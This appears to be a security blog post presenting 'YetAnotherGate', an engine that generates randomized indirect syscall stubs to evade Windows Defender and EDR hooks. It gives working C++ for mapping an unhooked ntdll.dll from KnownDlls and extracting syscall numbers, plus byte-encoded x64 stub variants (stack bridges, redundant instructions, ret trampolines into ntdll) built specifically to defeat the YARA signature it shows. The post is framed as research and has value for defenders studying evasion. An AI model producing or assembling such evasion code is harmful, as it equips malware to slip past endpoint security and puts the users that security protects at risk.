Polymorphic Syscall Engine

In this blog we will be talking about syscalls and how to make them a lil stealthy. Projects like HellsGate (https://github.com/am0nsec/HellsGate), Halo's Gate (https://github.com/boku7/AsmHalosGate), HellsHall (https://github.com/Maldev-Academy/HellHall), etc. are the pioneers of these methods. They work, but they lack stealth because they produce syscall stubs that are easily detected by basic YARA rules. This blog is based on my project YetAnotherGate and covers the core logic in some detail.

C++

Assembly (x64)

x64dbg

Setup

Everything we are going to talk about was done on the latest Windows and Defender versions, which at the time of writing this blog are:

Windows OS

Edition: Windows 11 Pro
Version: 25H2
OS Build: 26200.7840

Defender Engine

Client: 4.18.26010.5
Engine: 1.1.26010.1
AV / AS: 1.445.222.0

Environment

Everything is created and built to test modern security with all security features turned ON:

✓ Real-time protection

✓ Tamper Protection

✓ Memory integrity

✓ Memory access protection

✓ Microsoft Vulnerable Driver Blocklist

Warning

This is not just any project built to run in a vulnerable environment with security features turned off. This is some serious work and hence made just for education and research purposes.

Syscalls

Modern operating systems are built on the concept of Protection Rings (https://en.wikipedia.org/wiki/Protection_ring). User Space (Ring 3) is where your everyday programs run (web browsers, games, word processors). Programs here are restricted: they cannot directly access hardware, read arbitrary memory, or manage the network. Kernel Space (Ring 0) is the core operating system. It has absolute control over everything: the CPU, memory, hard drives, and network interfaces. If a user program wants to do something useful like read a file from the hard drive, print text to the screen, or send a network packet, it cannot do it directly. It must ask the kernel to do it. The syscall instruction is the mechanism for making that request.

Syscall Flow Path: `WriteFile` flow path from O'Reilly (https://oreilly.com)

A really nice example is the flow path of WriteFile. When the process calls WriteFile, which lives in Kernel32.dll, that function calls a less abstracted function, NtWriteFile, inside another system library, ntdll.dll. The CPU then transitions from user mode to kernel mode after the syscall instruction. ntdll.dll is a very important dll in this cat and mouse game between security vendors and malware authors, as it contains the SSNs for all the functions we are going to talk about.

Syscalls via a debugger

Let us look at some syscall stubs via a debugger. We can use x64Dbg to catch any function and look what SSN (System Service Number) it has.

syscall_debugger_1 — `NtWriteFile` inside the debugger

In the above image, I have opened x64Dbg. To find the SSN of any function, we can simply go to the "Symbols" tab, where the left panel lists all the dlls the process has loaded. ntdll.dll is at the bottom; clicking on it shows all the functions it exports, one of which is NtWriteFile with Ordinal 688. Double clicking on the entry brings us back to the "CPU" tab, where we can see the following:

syscall_debugger_2 — `NtWriteFile` syscall stub

From the debugger we can see something like this:

Assembly Stub
mov r10, rcx
mov eax, 8
syscall

These 3 instructions are very important, and if you look closely in the above image, every function has the same pattern, the only difference we can find is in the number in the mov eax, 8 instruction. The number 8 is the SSN for the function. So, this means if we know the SSN of a function we can create a syscall stub for it and execute it ourselves.

The Security Landscape

Now that we know what happens when a function is called and what syscalls are, we can look at the security landscape and get a gist of why syscalls are so important.

Security solutions love to hook functions in both user mode and kernel mode, so for any security researcher or threat actor, bypassing these hooks becomes very important in order not to get flagged. By placing the parameters in registers and on the stack in compliance with the x64 calling convention (https://learn.microsoft.com/en-us/cpp/build/x64-calling-convention?view=msvc-170), then building and executing the syscall stub with the specific SSN, one can bypass these user mode hooks.

EDRs/AVs know this and hide the SSN by patching the ntdll.dll for the process. Security vendors do this by injecting their own dll in the process which patches the ntdll.dll.

Knowing this, researchers have found ways to still get their hands on a clean ntdll.dll to get the SSNs. Some of the techniques are Blindside (https://github.com/CymulateResearch/Blindside), reading from disk (https://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++), etc. But all these techniques have their own detection vectors.

YetAnotherGate

YetAnotherGate focuses on eliminating one of the detection vectors in modern syscall implementations. Stubs generated by modern solutions can be easily detected by YARA rules like:

YARA rule
rule Detect_Direct_Syscall_Stub_08
{
    strings:
        // 4C 8B D1       : mov r10, rcx
        // B8 00 00 00 00 : mov eax, 0x00000000
        // 0F 05          : syscall
        $syscall_sequence = { 4C 8B D1 B8 ?? ?? ?? ?? 0F 05 }

    condition:
        $syscall_sequence
}
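To make the rule concrete, here is a minimal C++ sketch of what a scanner does with that hex string: it slides the pattern over a buffer and treats every `??` as a wildcard. The names `PatByte`, `kStubPattern` and `find_pattern` are made up for this illustration and are not part of YARA or YetAnotherGate.

```cpp
#include <cstddef>
#include <cstdint>
#include <optional>
#include <vector>

// One pattern element: a concrete byte, or a wildcard (the `??` in the rule).
struct PatByte {
    std::uint8_t value;
    bool wildcard;
};

// { 4C 8B D1 B8 ?? ?? ?? ?? 0F 05 } from the rule above.
static const std::vector<PatByte> kStubPattern = {
    {0x4C, false}, {0x8B, false}, {0xD1, false}, {0xB8, false},
    {0x00, true},  {0x00, true},  {0x00, true},  {0x00, true},
    {0x0F, false}, {0x05, false},
};

// Returns the offset of the first match, or std::nullopt if there is none.
inline std::optional<std::size_t> find_pattern(const std::vector<std::uint8_t>& data,
                                               const std::vector<PatByte>& pat) {
    if (pat.empty() || data.size() < pat.size()) return std::nullopt;
    for (std::size_t i = 0; i + pat.size() <= data.size(); ++i) {
        bool hit = true;
        for (std::size_t j = 0; j < pat.size(); ++j) {
            // Wildcards match anything; concrete bytes must match exactly.
            if (!pat[j].wildcard && data[i + j] != pat[j].value) {
                hit = false;
                break;
            }
        }
        if (hit) return i;
    }
    return std::nullopt;
}
```

A buffer containing `4C 8B D1 B8 08 00 00 00 0F 05` matches no matter what the SSN is, because the four immediate bytes are wildcards. Change a single fixed byte of the sequence and the match is gone, which is exactly the weakness this kind of signature has.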

YetAnotherGate doesn't just generate the stubs; it generates obfuscated assembly stubs using de-optimization, a method inspired by this Phrack article (https://phrack.org/issues/71/15_md#article). You can find the working PoC at the link below:

YetAnotherGate repository

SSN retrieval

As we discussed, security solutions like to hide the SSN, so we will have to use one of the methods to retrieve a clean ntdll.dll. This part of the project always has room for improvement, as security solutions catch up really fast, but right now we will retrieve a clean copy from KnownDlls.

Clean ntdll.dll

Windows caches frequently used system DLLs in a special kernel object directory called \KnownDlls to speed up process creation, so we can target it. This is not the best way to do this, but for now we will work with it.

A note

You will see me calling functions like fn.MyNtOpenSection instead of NtOpenSection. fn is just a structure that holds functions which are resolved dynamically at runtime, and each one carries a My prefix in the actual implementation. You will also find some custom wrappers like err and norm for logging.

Get_clean_ntdll()

InitUnicodeString(usName, L"\\KnownDlls\\ntdll.dll");
InitializeObjectAttributes(&objAttr, &usName, OBJ_CASE_INSENSITIVE, nullptr, nullptr);

NTSTATUS status = fn.MyNtOpenSection(&hSection, SECTION_MAP_EXECUTE | SECTION_MAP_READ, &objAttr);
if(!NT_SUCCESS(status))
{
  err("NtOpenSection failed: 0x%X", status);
  return 0;
}

We request a handle (hSection) to the memory section containing the clean ntdll.dll and ask for SECTION_MAP_EXECUTE and SECTION_MAP_READ permissions. We absolutely need the execute permission because we will make the stubs reflective, which we will talk about later.

Get_clean_ntdll()

status = fn.MyNtMapViewOfSection(hSection, fn.MyGetCurrentProcess(), &base, 0, 0, nullptr, &viewSize, ViewShare, 0, PAGE_EXECUTE_READ);
if(!NT_SUCCESS(status))
{
  err("MyNtMapViewOfSection Failed");
  return 0;
}

fn.MyNtClose(hSection);

sLibs.hUnhookedNtdll = (HMODULE)base;
norm("\nClean ntdll.dll address via fallback (KnownDlls :/ ) -> 0x", std::hex, CYAN"", sLibs.hUnhookedNtdll);

This is the core action. We take the handle to the clean ntdll.dll section and map it into the virtual memory space of the current process (MyGetCurrentProcess()). The newly mapped memory is marked as readable and executable, which is necessary because we intend to run it later. base now stores the address of the clean ntdll.dll.

SSN

Now all we need to do is get the SSN for the functions we need. For this we scan the bytes of each function for specific byte patterns. We should usually avoid relying on byte patterns as much as we can: if Microsoft changes anything related to this in the OS, stuff might break for us. In this case we can get away with it, because changing the syscall stubs would require some serious changes in the OS, which is not going to happen soon. We should also look at the hex values for each instruction, so we know what we are looking for:

Assembly Instruction | Hex / Opcode
mov r10, rcx         | 4C 8B D1
mov eax, SSN         | B8 ?? ?? ?? ??
syscall              | 0F 05

So, now that we have a clean ntdll.dll, we can use GetProcAddress to find the required function. Once we have the function's address we can traverse it like:

GetSSN()

BYTE* pBytes = reinterpret_cast<BYTE*>(vpfunction);
if(pBytes[0] == 0x4C && pBytes[1] == 0x8B && pBytes[2] == 0xD1)
{
    norm("\n");ok("Function ", sEntry[j].function_name," is Unhooked\n");
    for(int i = 0; i < 32; ++i)
    {
        if(sEntry[j].SSN != 0 && sEntry[j].pCleanSyscall != nullptr) break;
        if(!sEntry[j].SSN && i + 4 < 32 && pBytes[i] == 0xB8)
        {
            sEntry[j].SSN = *(DWORD*)(pBytes + i + 1);
            //norm("SSN:",CYAN" 0x", std::hex, sEntry[j].SSN, "\n"); 
        }

        if(!sEntry[j].pCleanSyscall && i + 1 < 32 && (pBytes[i] == 0x0F && pBytes[i+1] == 0x05))
        {
            sEntry[j].pCleanSyscall = pBytes + i;
            //norm("Address of the Syscall: ", CYAN"0x", std::hex, reinterpret_cast<void*>(sEntry[j].pCleanSyscall), "\n");
        }
    }
}

You might have noticed the if(pBytes[0] == 0x4C && pBytes[1] == 0x8B && pBytes[2] == 0xD1) check. Just as a precaution, we check the starting bytes for any hooks. If the function had a hook, we would have seen a jmp instruction there instead. To get the SSN, once we reach the mov eax instruction, which has opcode 0xB8, we can just read a DWORD from the next byte with *(DWORD*)(pBytes + i + 1) and we have the SSN. As we will make the stubs reflective, we should also get the address of the syscall instruction. It is encoded as 0F 05, which is exactly what we check with pBytes[i] == 0x0F && pBytes[i+1] == 0x05. So, now we are all set to generate the stubs, which we will cover in the next section.

De-optimization

This here is the heart of this project, so we need to understand what evasion by de-optimization is. When developers write code, compilers translate it into assembly. Modern compilers are incredibly smart; they optimize the code to make it as short, fast, and efficient as possible. Because most software is compiled this way, security tools build their detection signatures on these predictable, highly optimized patterns, and in our case they can simply look for the syscall stubs. In the process of de-optimization we take this efficient, clean assembly code and intentionally make it longer, messier and less efficient. This completely changes the signature of that specific code. A very basic example that the Phrack post mentions is:

        lea rcx, [0xDEAD] ------+->  lea rcx, [1CE54]
                                +->  sub rcx, EFA7

So, in this example we don't load 0xDEAD directly. We load 0x1CE54 and then subtract 0xEFA7, and since 0x1CE54 - 0xEFA7 = 0xDEAD, the RCX register still holds 0xDEAD after these two instructions execute. The program's behavior remains identical, but the compiled bytes are now completely different.

Arithmetic Partitioning

Compilers naturally want to load hardcoded values like memory offsets, constants, etc. directly into registers because it is fast. We can however break this pattern: instead of loading a value directly, we can force the CPU to calculate it on the fly using randomized math:

Original              ->  Mutated Sequence

mov eax, 12345678h    ->  mov eax, 89ABCDEFh
                          sub eax, 77777777h

add dl, 25h           ->  add dl, 6Ah
                          sub dl, 45h

sub cx, 10A5h         ->  sub cx, 8B22h
                          add cx, 7A7Dh

push 0C0FFEEh         ->  push 1A2B3C4Dh
                          sub dword ptr[esp], 196A3C5Fh

mov ebp, 0DEADBEEFh   ->  mov ebp, 0CAFEBABEh
                          xor ebp, 14530451h
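The rewrites above all rest on fixed-width wrap-around arithmetic, which is easy to check. The following is a minimal C++ sketch, not code from YetAnotherGate: `split_sub` and `split_xor` are hypothetical helper names that pick a random first operand and derive the second one, and the `static_assert` lines verify the rows of the table at compile time.

```cpp
#include <cstdint>
#include <random>
#include <utility>

// Split `target` into (a, b) such that a - b == target modulo 2^32,
// mirroring "mov eax, a / sub eax, b". `a` is chosen at random.
inline std::pair<std::uint32_t, std::uint32_t> split_sub(std::uint32_t target,
                                                         std::mt19937& rng) {
    std::uint32_t a = static_cast<std::uint32_t>(rng());
    std::uint32_t b = a - target;  // unsigned arithmetic wraps, so this always works
    return {a, b};
}

// Same idea for XOR: a ^ b == target, mirroring "mov ebp, a / xor ebp, b".
inline std::pair<std::uint32_t, std::uint32_t> split_xor(std::uint32_t target,
                                                         std::mt19937& rng) {
    std::uint32_t a = static_cast<std::uint32_t>(rng());
    std::uint32_t b = a ^ target;
    return {a, b};
}

// The rows of the table, checked at compile time.
static_assert(0x89ABCDEFu - 0x77777777u == 0x12345678u, "mov eax row");
static_assert(static_cast<std::uint8_t>(0x6A - 0x45) == 0x25, "add dl row");
static_assert(static_cast<std::uint16_t>(0x8B22 - 0x7A7D) == 0x10A5, "sub cx row");
static_assert(0x1A2B3C4Du - 0x196A3C5Fu == 0x00C0FFEEu, "push row");
static_assert((0xCAFEBABEu ^ 0x14530451u) == 0xDEADBEEFu, "mov ebp row");
```

Because the math is done modulo 2^32, the split is valid even when the random operand is smaller than the target: the subtraction wraps around and the result still lands on the original constant.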

Logical Inverse

By leveraging properties of Boolean algebra, specifically De Morgan's laws and the fact that complementing both operands of an XOR leaves the result unchanged, we can take a single, predictable logical instruction and mutate it into a multi-step sequence. It looks completely different in hex, but the CPU computes the exact same final result.

Original              ->  Mutated Sequence

xor r10d, 1337BEEFh   ->  not r10d
                          xor r10d, 0ECC84110h

and al, 0Fh           ->  not al
                          or al, 0F0h
                          not al

or edx, 0A5A5A5A5h    ->  not edx
                          and edx, 5A5A5A5Ah
                          not edx
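These identities can be checked mechanically. Below is a small C++ sketch that models each mutated sequence as a `constexpr` function and compares it against the original operation. The function names are invented for this illustration.

```cpp
#include <cstdint>

// not x / xor x, ~k   behaves like   xor x, k    (since ~x ^ ~k == x ^ k)
constexpr std::uint32_t xor_via_not(std::uint32_t x, std::uint32_t k) {
    return ~x ^ ~k;
}

// not x / or x, ~k / not x   behaves like   and x, k    (De Morgan)
constexpr std::uint8_t and_via_or(std::uint8_t x, std::uint8_t k) {
    return static_cast<std::uint8_t>(
        ~(static_cast<std::uint8_t>(~x) | static_cast<std::uint8_t>(~k)));
}

// not x / and x, ~k / not x   behaves like   or x, k    (De Morgan)
constexpr std::uint32_t or_via_and(std::uint32_t x, std::uint32_t k) {
    return ~(~x & ~k);
}

// The immediates in the table are the bitwise complements of the originals.
static_assert(~0x1337BEEFu == 0xECC84110u, "xor row immediate");
static_assert(static_cast<std::uint8_t>(~0x0F) == 0xF0, "and row immediate");
static_assert(~0xA5A5A5A5u == 0x5A5A5A5Au, "or row immediate");

// Spot checks of the three rewrites against the plain operations.
static_assert(xor_via_not(0x12345678u, 0x1337BEEFu) == (0x12345678u ^ 0x1337BEEFu), "xor");
static_assert(and_via_or(0xAB, 0x0F) == (0xAB & 0x0F), "and");
static_assert(or_via_and(0x12345678u, 0xA5A5A5A5u) == (0x12345678u | 0xA5A5A5A5u), "or");
```

Note that only the final register value is identical. The intermediate `not` leaves the flags alone, but the last logical instruction in each sequence sets them from the final result, just as the original instruction would.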

Register Swapping

It is exactly what it sounds like. Consider XOR RCX, 0xAA: we can replace RCX with any other 64-bit register by exchanging the two registers before and after the original instruction.

Original         ->  Mutated Sequence

xor r8, 0A5A5h   ->  xchg r8, r9
                     xor r9, 0A5A5h
                     xchg r8, r9

add r12, 100h    ->  xchg r12, r13
                     add r13, 100h
                     xchg r12, r13

mov r14, r15     ->  xchg r14, rbp
                     mov rbp, r15
                     xchg r14, rbp
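To see why the swap leaves everything else untouched, here is a toy C++ model of a register file, written purely for illustration (the `Regs` type and both helper functions are assumptions, not project code). It applies `add dst, imm` directly and through the xchg sandwich, then lets us compare the two results.

```cpp
#include <array>
#include <cstddef>
#include <cstdint>
#include <utility>

// Toy register file: index = x64 register number (only a few are named here).
using Regs = std::array<std::uint64_t, 16>;
enum Reg : std::size_t { R8 = 8, R9 = 9, R12 = 12, R13 = 13, R14 = 14, R15 = 15 };

// Original form: add dst, imm
inline Regs add_direct(Regs r, Reg dst, std::uint64_t imm) {
    r[dst] += imm;
    return r;
}

// Mutated form: xchg dst, tmp / add tmp, imm / xchg dst, tmp
inline Regs add_swapped(Regs r, Reg dst, Reg tmp, std::uint64_t imm) {
    std::swap(r[dst], r[tmp]);  // tmp now holds the value we want to modify
    r[tmp] += imm;              // do the real work on the stand-in register
    std::swap(r[dst], r[tmp]);  // put both registers back where they belong
    return r;
}
```

Both functions return the same register file for any `dst != tmp`. One caveat for two-operand instructions: the stand-in register must not be an operand of the original instruction. Rewriting `mov r14, r15` with `r15` as the stand-in would turn the middle instruction into `mov r15, r15`, and the net effect would be nothing at all.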

Syscall Stubs

Now we can generate syscall stubs. A stub should look like:

Indirect Syscall Stub
mov r10, rcx
mov eax, SSN
jmp [syscall_loc]

Notice we don't execute the syscall instruction ourselves. If we executed it here, security solutions could see that the syscall instruction ran from a very unlikely location and flag it. Hence we use the actual syscall instruction inside ntdll.dll, so the call appears to originate from inside the system dll.

In our syscall stub, we won't use the original instructions but use the concept of de-optimization to create different variants for each of the original instructions, and make the syscall stub by randomly selecting the generated de-optimized variants for each of the instructions.

Step 1: Setup R10 | Original: mov r10, rcx      | 1 of 3 chosen: v1A, v1B, v1C
Step 2: Load SSN  | Original: mov eax, SSN      | 1 of 3 chosen: v2A, v2B, v2C
Step 3: Execute   | Original: jmp [syscall_loc] | 1 of 3 chosen: v3A, v3B, v3C

`mov r10, rcx`

V1A: Stack Bridge & Redundant XOR

byte_stub[]
0x9c,                   // pushf
0x51,                   // push rcx
0x4D, 0x31, 0xD2,       // xor r10, r10
0x4C, 0x87, 0x14, 0x24, // xchg r10, [rsp]
0x59,                   // pop rcx
0x9d                    // popf

The main logic here lies in push rcx and xchg r10, [rsp]. Instead of moving rcx straight into r10, we push the value of rcx onto the stack and then use the xchg instruction to pull it into r10, breaking the pattern. xor r10, r10 is redundant. However, in malware/evasion dev, inserting redundant instructions alters the byte signature and throws off linear disassembly analysis. Because xor r10, r10 alters the CPU's condition flags, the stub saves the flags to the stack and restores them afterwards so that it doesn't accidentally break any surrounding program logic, hence the pushf and popf.

V1B: Non-Destructive Stack Bridge

byte_stub[]
0x9c,                   // pushf
0x51,                   // push rcx
0x4C, 0x8B, 0x14, 0x24, // mov r10, [rsp]
0x59,                   // pop rcx
0x9d                    // popf

While the previous example altered the state of the CPU by wiping out the RCX register, this one takes a much cleaner, non-destructive approach using the stack as a temporary bridge. It bypasses the static 0x4C, 0x8B, 0xD1 signature but leaves every other register exactly as it found it. The heart of this approach is mov r10, [rsp]. Instead of popping the stack or swapping values, this instruction simply reads the value stored at the top of the stack (the address held in RSP) and copies it into R10.

V1C: Redundant AND & Opcode Synonym

byte_stub[]
0x9c,                                       // pushf
0x49, 0x81, 0xE2, 0x00, 0x00, 0x00, 0x00,   // and r10, 0
0x49, 0x89, 0xCA,                           // mov r10, rcx
0x9d                                        // popf

Here we use redundancy again. and r10, 0 performs a logical AND of R10 with 0, and anything ANDed with 0 becomes 0, so this zeros out R10. Just like the xor r10, r10 from the first example, this instruction is functionally useless because the very next line overwrites R10 anyway. It acts purely as a 7-byte padding wall to break up linear signatures and confuse static analysis. mov r10, rcx is the hero here; notice the bytes: 0x49, 0x89, 0xCA. The standard, heavily-signatured byte sequence for mov r10, rcx that EDRs look for is 0x4C, 0x8B, 0xD1. x86 has two encodings for a register-to-register mov: opcode 0x8B (mov r64, r/m64) and opcode 0x89 (mov r/m64, r64). This stub uses the second form, so it executes the exact same instruction with entirely different bytes. As we use an and, we also need to save the flags, hence the pushf and popf.

`mov eax, [SSN]`

V2A: Fragmented Additive Reconstruction

byte_stub[]
0x31, 0xC0,                                         // xor eax, eax
0xB0, 0x00,                                         // mov al, SSN_LOW
0x81, 0xC0, 0x00, 0x00, 0x00, 0x00                  // add eax, SSN_HIGH_SHIFTED

Instead of moving data into the full 32-bit EAX register, we target AL, which is the lowest 8-bit section of EAX. We move the lowest byte of the syscall number into this slot using mov al, SSN_LOW

info

If the SSN fits in a single byte (0xFF, or 255, and below), the actual SSN is already fully loaded here.

We now add the remaining upper bytes of the syscall number to the EAX register by add eax, SSN_HIGH_SHIFTED and EAX now perfectly holds the intended SSN, ready for the syscall instruction.

V2B: The Bifurcated SSN Load

byte_stub[]
0xB8, 0x00, 0x00, 0x00, 0x00,                    // mov eax, X
0x05, 0x00, 0x00, 0x00, 0x00                     // add eax, Y

Instead of loading the SSN directly, we construct it at runtime. We create two numbers X and Y such that X + Y = SSN. This requires a lil bit of pre-processing, as you can see.

  BYTE randNum = (BYTE)(rand() % 0x50);

  *(DWORD*)(byte_stub + 1) = randNum;
  *(DWORD*)(byte_stub + 6) = sEntry->SSN - randNum;

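If you are still reading this blog, I would assume you know what is happening here, so briefly: randNum (a random value below 0x50) is patched in as X, the immediate of mov eax, and SSN - randNum is patched in as Y, the immediate of add eax. If randNum happens to be larger than the SSN, the subtraction wraps around as a 32-bit value and the add still lands on the SSN.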

V2C: Stack-Bridged SSN Load

byte_stub[]
0x9C,                                             // pushfq
0x31, 0xC0,                                       // xor eax, eax
0x68, 0x00, 0x00, 0x00, 0x00,                     // push SSN
0x58,                                             // pop rax
0x9D,                                             // popfq

This stub completely avoids the standard mov eax, SSN by routing the SSN through the stack. Pretty basic: push SSN pushes the hardcoded SSN onto the top of the stack, and pop rax pops that value (the SSN) into the 64-bit RAX register. We also need to save the flags because we are using xor here too.

`jmp [syscall_loc]`

V3A: The XCHG-RET Trampoline

byte_stub[]
0x50,                                                           // push rax
0x48, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,     // mov rax, syscall_addr
0x48, 0x87, 0x04, 0x24,                                         // xchg rax, [rsp]
0xC3                                                            // ret

As we want to avoid detection by security solutions, we make our stub reflective and jump to the syscall address instead of hardcoding the syscall instruction. Remember from our previous stubs that RAX holds our carefully constructed System Service Number (SSN). If RAX changes, the kernel won't know what function you want to call. So, to avoid this, we push the rax register onto the stack. Now, mov rax, syscall_addr loads a memory address into RAX. This address points to a legitimate syscall instruction already sitting naturally somewhere inside ntdll.dll. The magic lies in xchg rax, [rsp]: it swaps the value in RAX (the ntdll.dll address) with the value sitting at the top of the stack ([RSP], which is your SSN). Finally, the ret instruction pops the memory address off the top of the stack and jumps to it, effectively loading it into the CPU's Instruction Pointer.

V3B: The Pushf-Allocated ROP Jump

byte_stub[]
0x9C,                               // pushf
0x48, 0xC7, 0x04, 0x24,             // mov qword [rsp], imm32 (lower half; REX.W sign-extends, upper half is overwritten next)
0x00, 0x00, 0x00, 0x00,
0xC7, 0x44, 0x24, 0x04,             // mov dword [rsp+4], imm32 (upper half)
0x00, 0x00, 0x00, 0x00,
0xC3,                               // ret

This stub builds on the trampoline concept from the last example, but it introduces a completely new way to construct the jump address and allocate stack space. Instead of moving an address into a register and pushing it, this stub constructs the jump address directly inside the stack memory, piecemeal. Here pushf is used for a completely different reason: stealthy stack allocation. Pushing the flags automatically subtracts 8 from the Stack Pointer (RSP = RSP - 8), so we have just allocated 8 bytes of space on the stack without using a highly visible sub rsp, 8 or push rax instruction.

info

The fact that it wrote the RFLAGS data into that space doesn't matter, because the next instructions will immediately overwrite it.

The first mov takes the lower 32 bits of the target memory address and writes them at [rsp], the start of the space we just allocated on the stack. Because the instruction is encoded with a REX.W prefix, it stores the sign-extended immediate across all 8 bytes, which is fine since the upper half is replaced right after. mov dword [rsp+4], imm32 takes the upper 32 bits of the target address and writes them into the upper 4 bytes of that same stack space (RSP + 4). The stack memory at [RSP] now contains the full 64-bit memory address.

info

You might have noticed that we pushed the flags but did not pop them back. If you executed popf here, the CPU would take the 64-bit address we just painstakingly built and shove it into the RFLAGS register, removing it from the stack. That would ruin the payload and likely crash the program.

And finally ret pops the 64-bit value currently sitting at the top of the stack into the Instruction Pointer (RIP) and we are done.

V3C: The Basic Jump

byte_stub[]
0xFF, 0x25, 0x00, 0x00, 0x00, 0x00,                // jmp [rip+0]
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00     // syscall address

We could also just fall back to the old bread and butter as we are already avoiding the syscall via the jmp.

Future Improvements

`ntdll.dll` Sourcing

We heavily depend on known methods to fetch a clean ntdll.dll. While some methods currently work, others will likely fail as security solutions evolve. Implementing dynamic, robust sourcing is a top priority.

Instruction Variant Expansion

We plan to expand our mutation engine to add far more de-optimized variants for different instructions, drastically increasing the randomness and entropy of the generated stubs.

References

Windows API Call Flow (oreilly)
Evasion by De-optimization (Ege BALCI)
syscalls (crow)
Direct Syscalls vs Indirect Syscalls (redops)
Direct Syscalls: A journey from high to low (redops)
Understanding the Windows System Call Mechanism (medium)
A Deep Dive Into Malicious Direct Syscall Detection (paloaltonetworks)
System Call in OS (Operating System): What is, Types and Examples (guru99)
Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams (mdsec)
Syscalls with D/Invoke (offensivedefence)
Bypass EDR's memory protection, introduction to hooking (medium)
GitHub - am0nsec/HellsGate: Original C Implementation of the Hell's Gate VX Technique (GitHub)
